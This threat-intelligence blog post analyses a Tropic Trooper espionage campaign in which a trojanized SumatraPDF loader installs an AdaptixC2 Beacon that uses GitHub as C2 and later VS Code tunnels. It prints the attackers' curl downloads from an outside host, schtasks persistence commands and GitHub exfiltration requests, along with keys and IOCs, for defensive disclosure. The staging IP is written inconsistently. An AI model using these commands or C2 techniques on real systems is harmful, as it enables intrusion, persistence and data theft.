IntroductionOn March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain where a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for remote access. During our analysis, we observed that the threat actor likely targeted Chinese-speaking individuals in Taiwan, and individuals in South Korea and Japan. Based on the tactics, techniques, and procedures (TTPs) observed in this attack, ThreatLabz attributes this activity to Tropic Trooper (also known as Earth Centaur and Pirate Panda) with high confidence.In this blog post, ThreatLabz covers the Tropic Trooper campaign and the tools that were deployed to conduct intelligence gathering. Key TakeawaysOn March 12, 2026, ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals.The campaign used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.The shellcode loader used in this attack closely resembles the TOSHIS loader, which has been associated with Tropic Trooper and was previously reported in the TAOTH campaign.The threat actors created a custom AdaptixC2 Beacon listener, leveraging GitHub as their command-and-control (C2) platform.The staging server involved in this attack also hosted CobaltStrike Beacon and an EntryShell backdoor. Both malware types and configurations are known to have been used by Tropic Trooper. Technical AnalysisIn the sections below, ThreatLabz outlines the attack chain, starting with military-themed lures and leading to the deployment of the AdaptixC2 Beacon agent. We also discuss the use of a custom GitHub listener and the recurring TTP of abusing VS Code for remote access.Attack chainThe full sequence of the attack is illustrated in the figure below.Figure 1: Tropic Trooper attack chain leading to the deployment of an AdaptixC2 Beacon and VS Code tunnels.The ZIP archive contained documents with the following names roughly translated to English:Original Chinese FilenameEnglish TranslationCECC昆山元宇宙产业基地建设方案(20230325).docxCECC Kunshan Metaverse Industrial Base Construction Plan (20230325).docx中国声学智能产业声创中心建设和运营方案(2021112)(2)(1)(1).docxChina Acoustic Intelligence Industry Innovation Center Construction and Operation Plan (2021112)(2)(1)(1).docx武器装备体系结构贡献度评估.pdfAssessment of Contribution Degree of Weaponry System Architecture.pdf武器装备体系能力贡献度的解析与度量方法.pdfAnalysis and Measurement Methods for Capability Contribution of Weaponry Systems.pdf江苏自主智能无人系统产业基地建设方案(202304) .docxJiangsu Autonomous Intelligent Unmanned Systems Industrial Base Construction Plan (202304).docx美英与美澳核潜艇合作的比较分析(2025).exeComparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exeTable 1: The table lists the files found inside the ZIP archive, showing each original Chinese filename alongside its approximate English translation.Most of these files appear outdated. The document that appears to be the most recent, Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe, is actually a trojanized version of the SumatraPDF reader binary. When executed, this loader triggers a multi-stage attack: it downloads and displays a new decoy PDF that is shown to the victim while discreetly downloading and running an AdaptixC2 Beacon agent in the background.The downloaded lure PDF aligns with its file name, featuring analysis and visuals concerning American submarines and the AUKUS partnership (a security partnership between Australia, the U.K., and the U.S). The figure below illustrates the contents of the downloaded lure PDF.Figure 2: Tropic Trooper PDF lure containing information about the AUKUS partnership and American submarines.Stage 1 - TOSHIS loader (backdoored SumatraPDF)The trojanized executable resembles the open-source SumatraPDF reader at first glance, featuring identical certificates and PDB paths to those of the legitimate SumatraPDF executable. However, the signature of this binary is invalid because it has been trojanized with TOSHIS loader. Analysis shows the threat actor hijacks the executable’s control flow by redirecting the _security_init_cookie function to execute malicious code. Compared to earlier TOSHIS loader samples, where the entry point was modified to jump to the payload, this version uses a revised trojanization method that executes by overwriting _security_init_cookie instead.Figure 3: Comparison of the entry points in the trojanized and legitimate SumatraPDF versions.The InjectedCode function redirects to TOSHIS loader code. The function begins by constructing stack strings, which include the command-and-control (C2) IP address, the destination path for the lure file, DLL names, and a cryptographic key. Next, TOSHIS loader resolves various APIs using the Adler-32 hash algorithm. Subsequently, TOSHIS loader downloads the PDF decoy from 58.247.193[.]100 and opens it using ShellExecuteW. TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory. This shellcode is an AdaptixC2 Beacon agent. This marks a departure from earlier TOSHIS versions, which delivered either a Cobalt Strike Beacon or a Merlin Mythic agentANALYST NOTE: The AES key is derived by using the Windows API function CryptDeriveKey with the MD5 hash of a hard-coded key seed "424986c3a4fddcb6". The initialization vector (IV) is set to 0.An analysis of the InjectedCode function shows that it is largely identical to the TOSHIS loader described in TrendMicro's TAOTH report. The only notable differences are modifications to the stack strings and the removal of the language ID check. Although this sample resolves the GetSystemDefaultLangID API, the API is never actually invoked. Clear similarities can be observed between the injected code in these two samples, such as the use of the same User-Agent and a similar .dat file extension, as shown in the code examples below.Figure 4: Code comparison of the TOSHIS loader in the backdoored SumatraPDF sample and the TOSHIS loader described in the TAOTH report.Stage 2 - Backdoor: AdaptixC2 Beacon agent integrated with GitHubThe second-stage backdoor employed in this attack is the open-source AdaptixC2 Beacon agent, which incorporates a customized Beacon Listener. The table below shows the extracted configuration:OffsetFieldValueConfig Meta0x00Extra field0x6a (106)0x04Profile size156 bytes (encrypted)Decrypted Profile0x08Agent type (wmark)0xbe4c0149GitHub Transport Config0x0CRepo ownercvaS23uchsahs0x1ERepo namerss0x26API hostapi.github.com0x39Auth tokenghp_…0x66Issues API pathrepos/cvaS23uchsahs/rss/issues?state=openTiming Config0x94Kill datedisabled0x98Working timedisabled (always active)0x9CSleep delay60 seconds0xA0Jitter42RC4 Key0xA4RC4 key7adf76418856966effc9ccf8a21d1b12Table 2: Configuration extracted from a Tropic Trooper AdaptixC2 Beacon agent.The RC4 key in the config above is used to decrypt the encrypted parts of the config, as well as beacon heartbeats. Because the agent is open-source, our focus will be on the custom beacon listener component, which utilizes GitHub as its C2 server. The figure below shows the layout of the GitHub repository used for C2.Figure 5: Layout of the Tropic Trooper GitHub repository used by an AdaptixC2 Beacon.The figure below shows the details of GitHub issues used for C2.Figure 6: Example of GitHub issues used by AdaptixC2.The agent starts by generating a 16-bytes RC4 session key using RtlRandomEx(GetTickCount()) to encrypt all subsequent C2 traffic, which is a standard practice for an AdaptixC2 agent. However, this custom listener differs from the typical AdaptixC2 HTTP/TCP listeners because the server cannot identify the agent's external IP address since it is using GitHub. As a result, the agent retrieves its external IP address by sending a request to ipinfo.io. This external IP address is then included and sent back to the C2 with every beacon. The agent uses the following HTTP request to retrieve its external IP address from ipinfo.io.GET /ip HTTP/1.1
User-Agent: curl/8.5.0 // Hardcoded user agent
Host: ipinfo.io
Cache-Control: no-cacheThe agent then sends a beacon to the C2 by performing a POST request to GitHub Issue #1 to establish a session. The beacon follows the standard AdaptixC2 format, which contains the RC4 session key and a random 4-byte number used as an agent ID. These values are RC4 encrypted using the key in the agent’s config, Note that the agent ID is regenerated each time the agent is initialized. The agent uses this ID to identify and process commands specifically intended for it. The following figure shows the C2 workflow:Figure 7: Diagram showing the C2 workflow.After beaconing, the agent checks for tasks to be executed by making the following request:GET /repos/cvaS23uchsahs/rss/issues?state=open HTTP/1.1The API returns a JSON list of open issues, and the agent uses substring matching, rather than a full JSON parser, to extract the issue number, title, and body fields for each issue retrieved. Depending on the issue title, the agent uses varying logic to process the issue and extract the actual task, which is RC4 encrypted using the session key.The agent processes the issue as follows:If the title is “beat”: This is the heartbeat/beacon issue, and the agent skips it.If the title starts with “upload” and ends with “.txt”: The agent finds the last “_” character in the title, expecting an 8-character hexadecimal agent ID embedded between the “_” character and the “.txt” extension. If this extracted ID matches the agent’s own ID, the agent continues on to process this issue. If the extracted ID does not match, the agent skips the issue. However, there are some unusual edge-cases. For example, the agent will process an issue if there is no “_” character in the title, or if there are less than 7 characters in the extracted ID.If the agent decides to process the issue, it constructs the contents API URL. For example: /repos/{repo_owner}/{repo_name}/contents/upload/{agent_id}/{issue_title} or /repos/cvaS23uchsahs/rss/contents/upload/c64df0d5/upload_1773341382_c64df0d5.txt.The agent then retrieves the download URL from the response using substring matching again.The agent then downloads the file from the repository, decodes its Base64-encoded contents, and queues the task for processing.If the title starts with “fileupload”: The agent extracts and Base64 decodes the “body” field, and queues the task for processing. This encrypted task contains the file path that the agent should exfiltrate. Note that there is no agent ID check here, so all agents will attempt to execute this task.If the title does not start with any of the 3 strings above: The agent decodes the Base64 title and queues it as a command for processing. Again, there is no agent ID check here, so all agents attempt to execute this task. The agent then proceeds to process all queued tasks. Each task in the queue is decrypted using the RC4 session key, and processed according to the standard AdaptixC2 agent procedure.After processing the task, the agent prepares a response payload. The response consists of two parts: the encrypted beacon packet sent previously (RC4 encrypted with the key from the agent’s config), and the AdaptixC2 agent data packet encrypted with the session key. The entire buffer is Base64-encoded, and the agent uploads the buffer as a file to GitHub. If the buffer is larger than 30MB, it is uploaded in chunks of 30MB, with each 30MB chunk having an incremental part number. An example of an upload request is shown below.PUT /repos/cvaS23uchsahs/rss/contents/download/fa302eb5/download_1773890673_part1.txt HTTP/1.1
// ...
Body: {"message":"upload","content":"<base64 blob>"}Once the file is successfully uploaded, the agent adds a comment to the issue containing the command to which it is responding.The “|@@@|” string is used as a token to separate multiple file parts, as shown below.POST /repos/cvaS23uchsahs/rss/issues/2/comments HTTP/1.1
// ...
Body: {"body":"fa302eb5|@@@|download_1773890673_part1.txt"}Stage 3 - Operations and operational securityBy monitoring the C2 communication flow through the GitHub repository, ThreatLabz noticed that beacons are deleted very quickly, often within 10 seconds of being uploaded. This rapid deletion is likely intended to destroy the session keys, preventing observers from decrypting the C2 messages.During our observation of this campaign, ThreatLabz found that the threat actor primarily used the Adaptix agent as an initial foothold for reconnaissance and access. When a victim was deemed "interesting," the threat actor deployed VS Code and utilized VS Code tunnels for remote access. On some machines, the threat actor installed alternative, trojanized applications, possibly to better camouflage their activities among the applications the victim normally uses.ThreatLabz observed the threat actor issuing the following commands:arp /acd C:\Users\Public\Documents & code tunnel user login --provider github > z.txtcode tunnel user login --provider github > z.txtcurl -O http://bashupload[.]app/6e1lhccurl -kJL https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64 -o %localappdata%\microsoft\windows\Burn\v.zipcurl -s 'ip.me?t=1&m=2'curl http://bashupload[.]app/zgel2a.bin -o v.zip & dircurl ip.me?t=1&m=2net view \\192.168.220.2schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHESTschtasks /create /tn \MicrosoftUDN /sc hourly /mo 2 /f /tr C:\Users\Public\Documents\MicrosoftCompilers.exe C:\Users\Public\Documents\2.library-mstasklist | findstr /i notetasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txttimeout 3 && schtasks /run /i /tn \MicrosoftUDNwmic process where processid=8528 get commandlineFurther monitoring of the staging server, 158.247.193[.]100, revealed that it also hosted the EntryShell backdoor, a custom backdoor known to be used by Tropic Trooper. This sample of EntryShell used the same AES-128 ECB key (afkngaikfaf) as previously reported. Additionally, the staging server was also found to host the Cobalt Strike Beacon, marked with the watermark “520”, another known indicator of Tropic Trooper activity. Threat AttributionThreatLabz attributes this attack to Tropic Trooper with high confidence based on the following factors:Use of TOSHIS: The loader used in this campaign matches the loader identified as TOSHIS in the TAOTH campaign.Trojanized binaries: The technique of using trojanized binaries (such as SumatraPDF) as part of the initial infection vector is consistent across both attacks. Specifically, a trojanized SunloginDesktopAgent.exe was observed in this campaign as part of a secondary infection.Publicly available backdoors: Similar to the TAOTH campaign, publicly available backdoors are used as payloads. While Cobalt Strike Beacon and Mythic Merlin were previously used, the threat actor has now shifted to AdaptixC2.Use of VSCode: In both campaigns, the threat actor deployed VS Code to establish a tunnel.Post-infection commands: The commands executed in this attack are similar to those reported in the TAOTH campaign, particularly the use of “z.txt” when creating a VS Code tunnel.Hosting of EntryShell backdoor: The EntryShell backdoor, a custom backdoor previously linked to Tropic Trooper, was also used.CobaltStrike Beacon: The Cobalt Strike beacon with the watermark “520” is a known signature of Tropic Trooper. Additionally, it utilized C2 URIs such as “/Originate/contacts/CX4YJ5JI7RZ,” which were also observed in earlier attacks attributed to Tropic Trooper. ConclusionThis campaign, attributed to Tropic Trooper, targeted Chinese-speaking individuals in Taiwan, and individuals in South Korea and Japan. ThreatLabz was able to make this attribution with high confidence based on the threat actor’s use of the TOSHIS loader and similar TTPs. For this campaign, the Tropic Trooper deployed an AdaptixC2 Beacon agent, which utilized a custom GitHub-based C2 listener to deploy VS Code tunnels for remote access. Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to TOSHIS at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for TOSHIS.Figure 8: Zscaler Cloud Sandbox report for TOSHIS loader.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:Win64.Trojan.TOSHISWin32.Backdoor.AdaptixC2Win32.Backdoor.EntryShellWin32.Backdoor.CobaltStrike Indicators Of Compromise (IOCs)File indicatorsHashesFilenameDescription3238d2f6b9ea9825eb61ae5e80e7365c2c65433696037f4ce0f8c9a1d78bdd6835c1b94da4f2131eb497afe5f78d8d6e534df2b8d75c5b9b565c3ec17a323afe5355da26 UnknownZIP archive containing lures and trojanized SumatraPDF67fcf5c21474d314aa0b27b0ce8befb219e3c4df728e3e657cb9496cd4aaf69648470b6347c7ce0e3816647b23bb180725c7233e505f61c35e7776d47fd448009e887857 资料/美英与美澳核潜艇合作的比较分析(2025).exeTrojanized SumatraPDF89daa54fada8798c5f4e21738c8ea0b4bd618c9e1e10891fe666839650fa406833d70afdaeec65bac035789073b567753284b64ce0b95bbae62cf79e1479714238af0eb74d.datEncrypted reflective loader shellcode and AdaptixC2 Beacon agente2dc48ef24da000b8fc1354fa31ca9ae6c68dc2e33780e07596c3c06aa819ea460b3d1257a95ce0b5f201d9880a6844a1db69aac7d1a0bf1c88f85989264caf6c82c6001N/ADecrypted AdaptixC2 Beacon agent DLL2d7cc3646c287d6355def362916c6d26adb47733c224fc8c0f7edc61becb578e560435ab3936f522f187f8f67dda3dc88abfd170f6ba873af81fc31bbf1fdbcad1b2a7fb1C.datEncrypted Cobalt Strike Beacon loader71fa755b6ba012e1713c9101c7329f8dc2051635ccfdc0b48c260e7ceeee3f96bf026fea6eaea92394e115cd6d5bab9ae1c6d088806229aae320e6c519c2d2210dbc94fe2C.datEncrypted Cobalt Strike Beacon loaderc620b4671a5715eec0e9f3b93e6532ba343be0f2077901ea5b5b9fb97d97892ac1a907e6b92a3a1cf5786b6e08643483387b77640cd44f84df1169dd00efde7af46b5714N/ADecrypted Cobalt Strike Beacon loader9a69b717ec4e8a35ae595aa6762d3c27401cc16d79d94c32da3f66df21d66ffd71603c143c29c72a59133dd9eb23953211129fd8275a11b91a3b8dddb3c6e502b6b63edbN/ADecrypted Cobalt Strike Beacon loaderNetwork indicatorsTypeIndicatorIP Address158.247.193[.]100URLhttps://api.github.com/repos/cvaS23uchsahs/rss/issuesURLhttps://47.76.236[.]58:4430/Originate/contacts/CX4YJ5JI7RZURLhttps://47.76.236[.]58:4430/Divide/developement/GIZWQVCLFURLhttps://stg.lsmartv[.]com:8443/Originate/contacts/CX4YJ5JI7RZURLhttps://stg.lsmartv[.]com:8443/Divide/developement/GIZWQVCLF MITRE ATT&CK FrameworkIDTactic, TechniqueDescriptionT1585.003Resource Development: Establish Accounts: Cloud AccountsThe threat actor created the GitHub account cvaS23uchsahs, which hosted the RSS registry used for C2 communication.T1587.001Resource Development: Develop Capabilities: MalwareThe threat actor developed a custom listener for the AdaptixC2 Beacon agent that utilized the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.T1588.001Resource Development: Obtain Capabilities: MalwareThe threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.T1588.002Resource Development: Obtain Capabilities: ToolThe threat actor used VS Code's tunnel feature for remote access to compromised systems.T1608.001Resource Development: Stage Capabilities: Upload MalwareThe threat actor hosted a second-stage shellcode payload on their server at 58.247.193[.]100 which the initial loader was designed to download and execute.T1608.002Resource Development: Stage Capabilities: Upload ToolThe threat actor uploaded VS Code to bashupload[.]app which was subsequently downloaded onto the victim machines.T1204.002Execution: User Execution: Malicious FileThe attack sequence requires a user to run the malicious file titled "美英与美澳核潜艇合作的比较分析(2025).exe". T1106Execution: Native APIThe initial loader utilized WinCrypt cryptographic functions to decrypt a second-stage shellcode. Additionally, it employed the ShellExecuteW API to launch a decoy PDF document.T1059.003Execution: Command and Scripting Interpreter: Windows Command ShellThe threat actor utilized the Windows Command Shell to run several commands for reconnaissance purposes (e.g., arp, net view, tasklist) and to use cURL for downloading VS Code.T1053.005Persistence: Scheduled Task/Job: Scheduled TaskThe threat actor created a scheduled task using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.T1036.001Defense Evasion: Masquerading: Invalid Code SignatureThe threat actor used a trojanized SumatraPDF executable that includes the original SumatraPDF signature, although the signature is no longer valid.T1036.004Defense Evasion: Masquerading: Masquerade Task or ServiceThe threat actor created scheduled tasks with names intended to blend in with legitimate system tasks such as \\MSDNSvc and \\MicrosoftUDN.T1620Defense Evasion: Reflective Code LoadingThe trojanized SumatraPDF loader downloaded a second-stage shellcode from the C2 IP 58.247.193[.]100 which reflectively loads the AdaptixC2 Beacon agent.T1027.007Defense Evasion: Obfuscated Files or Information: Dynamic API ResolutionThe initial loader identified Windows APIs by comparing Adler-32 hashes of their names.T1027.013Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded FileThe initial loader downloaded a second-stage payload and decrypted the shellcode in-memory using AES-128.T1127Defense Evasion: Trusted Developer Utilities Proxy ExecutionThe threat actor downloaded Roslyn, an open-source .NET compiler, to compile and execute malicious code.T1016Discovery: System Network Configuration DiscoveryThe threat actor ran the command arp /a to retrieve the local ARP table. The threat actor sent requests to ipinfo.io to identify the external IP address of compromised machines.T1005Collection: Data from Local SystemThe threat actor used AdaptixC2 Beacon agent’s fileupload feature to exfiltrate files from infected machines.T1071.001Command and Control: Application Layer Protocol: Web ProtocolsThe TOSHIS loader downloaded a decoy PDF and a second-stage shellcode payload over HTTP from the IP address 58.247.193[.]100.The AdaptixC2 Beacon agent used HTTP/S to communicate with its GitHub C2.T1102.002Command and Control: Web Service: Bidirectional CommunicationThe threat actor used GitHub for bidirectional C2 communication.T1219.001Command and Control: Remote Access Tools: IDE TunnelingThe threat actor deployed VS Code and used its remote tunneling feature for interactive access.T1105Command and Control: Ingress Tool TransferThe threat actor utilized the cURL command to retrieve tools from external servers onto the compromised system. These included a VS Code binary from https://code.visualstudio.com and additional payloads from http://bashupload[.]app.T1132.001Command and Control: Data Encoding: Standard EncodingThe threat actor used Base64 and RC4 to obscure C2 communications.T1573.001Command and Control: Encrypted Channel: Symmetric CryptographyThe AdaptixC2 beacon agent encrypted its C2 traffic using an RC4 session key.T1573.002Command and Control: Encrypted Channel: Asymmetric CryptographyThe threat actor used the GitHub API for C2, which communicates over HTTPS.T1001.003Exfiltration: Exfiltration Over Web Service: Exfiltration to Code RepositoryThe threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.T1041Exfiltration: Exfiltration Over C2 ChannelThe threat actor exfiltrated data over the same channel used for C2 communication.
The post Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener appeared first on Security Boulevard.
Yin Hong Chang (Zscaler)
Source: Security Boulevard
Source Link: https://securityboulevard.com/2026/04/tropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener/